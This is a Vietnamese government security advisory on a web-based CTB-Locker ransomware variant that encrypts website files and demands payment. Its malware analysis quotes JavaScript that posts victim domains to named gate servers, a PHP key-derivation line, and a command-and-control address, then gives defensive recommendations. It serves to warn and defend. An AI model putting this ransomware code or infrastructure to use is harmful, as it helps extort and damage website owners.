[AVA160318]Một biến thể mới của mã độc tống tiền (ransomware) đã được phát hiện vào khoảng giữa tháng 2 bằng cách phát tán thông qua các website.
Mã độc tống tiền đang trở thành mối đe doạ ngày một rõ nét về an toàn thông tin đối với người sử dụng hiện nay đặc biệt là với người sử dụng có ít kiến thức về an toàn thông tin. Tại Việt Nam cũng như trên thế giới đã ghi nhận được nhiều trường hợp mất mát dữ liệu vì bị mã hoá và đòi tiền chuộc bởi mã độc tống tiền.
Gần đây, biến thể mới của mã độc CTB-Locker đã được phát triển trên nền tảng web và hiện đang bắt đầu được phát tán. Một nhà nghiên cứu độc lập có tài khoản mang tên Benkow đã phát hiện ra mẫu mã độc này trong một cuộc điều tra khác liên quan đến an toàn thông tin.
Hình ảnh website bị nhiễm mã độc ransomware
Mã độc cho phép giải mã miễn phí 2 file
… thậm chí cho phép chat với kẻ tấn công trong trường hợp nạn nhân lo lắng
Tại thời điểm phát hiện ra mẫu mã độc này, số lượng web bị nhiễm CTB-Locker đã lên đến khoảng hơn 100 website. Đây có thể được coi là một chiến dịch tấn công mới nhắm đến các hệ thống website. Bằng cách tìm kiếm Google thông qua những từ khóa có trong trang chủ của mẫu mã độc, chúng ta có thể thấy được danh sách rất nhiều website đã bị nhiễm loại mã độc này.
Tại thời điểm viết bài, số lượng website bị nhiễm đã giảm theo từ khóa này
Thông qua việc phân tích mã nguồn của những trang website bị nhiễm mã độc, nhà nghiên cứu Benkow chỉ ra rằng, những website bị nhiễm này được điều khiển bởi một loạt những website khác.
admins = [“http://legal-website-design.com/access.php”, “http://inspirationbydesire.com/access.php”, “http://salonincognito.aaomg.com/access.php”];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace(‘http://’, ”).replace(‘https://’, ”).split(‘/’)[0]);
function post_admin(postdata, onsuccess) {
$.post(admins[iadmin], postdata+”&domain=”+domain, function (data) {
if (data[“status”] == “success”) {
onsuccess(data);
} else {
alert(data[“status”]);
}
}, ‘json’
).fail(function() {
alert(iadmin >= 2 ? ‘It seems like our server is down=( Try to push it again’ : ‘Push it again’);
iadmin = (iadmin + 1) % 3;
});
}
Theo đó chúng ta có thể thấy các yêu cầu POST được gửi đến những máy chủ cấp 2, được gọi là gate. Bằng cách thu thập thông tin từ những website bị nhiễm, tác giả thu thập được một lượng lớn những gate như thế này. Điều đó chứng tỏ chiến dịch tấn công bằng mã độc này được chuẩn bị rất kỹ càng và chi tiết. Chúng ta có thể suy đoán cách thức kết nối của hệ thống này như sau:
Tiếp tục phân tích và điều tra, tác giả đã chỉ ra rằng mẫu mã độc này được viết bằng PHP, bằng cách kết nối các gates với nhau thông qua 1 C&C server, kẻ tấn công có thể hoàn toàn điều khiển được việc mã hóa toàn bộ các file trên website bị nhiễm và giải mã chúng. Mã độc khi được lây nhiễm trên các website thông qua những lỗ hổng sẵn có của website, sẽ bắt đầu mã hóa toàn bộ các file có trên website theo danh sách đuôi mở rộng đã được định nghĩa trước đó trong mã độc. (AES-256)
Những dạng file sẽ bị mã hóa được tác giả tìm thấy trên những mã độc đã phát hiện
Mã độc tạo ra danh sách các tập tin dựa trên những thành phần mở rộng này sau đó được gửi đến hàm encrypt_files.Hàm này chọn hai tập tin trong danh sách và viết chúng vào test.txt.
Hai tập tin được mã hóa bằng một chìa khóa đầu tiên và có thể được giải mã miễn phí bằng cách sử dụng tính năng “Giải mã miễn phí”.
Các tập tin khác được mã hóa bằng một chía khóa khác và danh sách này được viết trong file allenc.txt.
Để xác định duy nhất các máy chủ bị nhiễm, các ransomware sử dụng một khóa dựa trên từ ký tự thứ 2 đến ký tự thứ 10 của hàm băm MD5 chuỗi: “djf33” + tên máy chủ (ví dụ: md5(djf33www 24horasonline.net))
$secret = substr(md5(“djf33”.cur_domain), 2, 10);
Khi nạn nhân nhấn vào nút “Decrypt”, mã độc sẽ gửi yêu cầu đến file access.php trên các gate servers. Những gate servers này thông qua việc xác thực với C&C Server, xác định nạn nhân đã trả tiền hay chưa, nếu đã trả thì trả về một tin nhắn kèm mã khóa giải mã. Mã độc sau khi nhận được mã khóa này sẽ sử dụng để giải mã những file đã bị mã hóa.
Theo tác giả, vào thời điểm điều tra, tác giả mới tìm ra được một địa chỉ của C&C server có tại 95.215.45.203 port 9338. Đến thời điểm hiện tại, Cục An toàn thông tin chưa phát hiện ra website trong nước nào bị tấn công bằng loại mã độc này, bên cạnh đó, tìm kiếm các website đã bị nhiễm bằng Google thông qua các từ khóa cũng cho thấy số lượng kết quả đã giảm đi. Tuy nhiên, mã nguồn của mã độc đã được công bố rộng rãi trên internet, điều đó dẫn tới rất có thể biến thể mã độc này sẽ tiếp tục được biến đổi và phát tán theo những hình thức khác nhau, thay đổi cả về giao diện và từ khóa. Khi bị nhiễm mã độc, toàn bộ website và những tài liệu kèm theo sẽ bị mã hóa hoàn toàn bằng mã hóa AES-256, và chỉ có thể giải mã bằng khóa riêng của kẻ tấn công, điều đó càng nguy hiểm hơn bao giờ hết đối với những website thông tin, website cung cấp các loại văn bản, ban hành thông tư của nhà nước.
Chính vì vậy, Cục An toàn thông tin đưa ra một số khuyến nghị cho người dùng, tổ chức trong nước để phòng chống biến thể mới của mã độc ransomware phiên bản web:
- Thường xuyên thực hiện việc sao lưu dữ liệu website, bao gồm cả những file tài liệu tĩnh và cơ sở dữ liệu.
- Cấu hình, phân quyền hệ thống webserver để phòng tránh việc một website bị tấn công lây nhiễm ảnh hưởng đến những website khác có trên cùng webserver.
- Tăng cường triển khai kiểm thử lỗ hổng bảo mật ứng dụng web và webserver.
- Thường xuyên theo dõi, cập nhật các bản vá bảo mật cho các dịch vụ webserver.
